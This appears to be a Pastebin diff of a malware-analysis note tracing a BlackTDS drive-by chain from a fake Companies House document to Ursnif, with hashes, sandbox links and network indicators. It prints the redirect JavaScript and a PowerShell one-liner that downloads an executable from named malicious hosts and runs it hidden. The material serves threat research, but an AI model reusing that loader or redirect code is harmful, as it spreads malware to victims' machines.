API tools faq
paste
View difference between Paste ID: UmfKd8yx and sKScRRZV
SHOW: | | - or go back to the newest paste.
1-
[]
1+
[BlackTDS Driveby Maldoc leads to Ursnif]
2
==
3
4-
[][1]

4+
[Maldoc - B1F7B208ACA0DE0CC28B547CD73EE980]

5-
[1]: 

5+
[https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4][1]

6
[1]:https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4 

7-
[]

7+
8
[Payload - 8cac839accda5f125d5f5d7226e4db92]

9
[https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c][1]

10
[1]:https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c 

11
12
[BlackTDS]

13
--

14
celsiumoftesla.cf	GET / HTTP/1.1 

15
94.23.47.105	GET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 

16
17
[BlackTDS JavaScript]

18
--

19
<style> html, body { margin: 0; padding: 0; height : 100%; } </style>

20
<script type="text/javascript"> 

21
document.write('\<script type=\'text/javascript\'\>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script\>');

22
</script>

23
<iframe src="" style="display:block; width:100%; height:100%; border:none; margin:0; padding:0;"></iframe><span style="visibility: hidden"><a href="/insert">j2B7wKaXk658V</a><a href="/register">3xfgzc1roc</a></span>

24
25
[Maldoc - fake Companies House]

26
--

27
94.23.47.105	OPTIONS /documents/ HTTP/1.1 

28
94.23.47.105	OPTIONS /documents/ HTTP/1.1 

29
94.23.47.105	OPTIONS /documents/ HTTP/1.1 

30
94.23.47.105	HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 

31
94.23.47.105	OPTIONS / HTTP/1.1 

32
94.23.47.105	HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 

33
94.23.55.137	GET /docs/content.bin HTTP/1.1 

34
35
http://allhealthsol.com/data/content.bin

36
37
[Maldoc PowerShell]

38
--

39
PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden"

40
41
42
[Ursnif Rjdeoo.exe]

43
--

44
https://86.105.18.236/index.html

45
46
47
48
***

49
![Pastebin Logo][image]

50
51
[image]: https://zerophagemalware.files.wordpress.com/2017/09/zerophageicon2.png
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!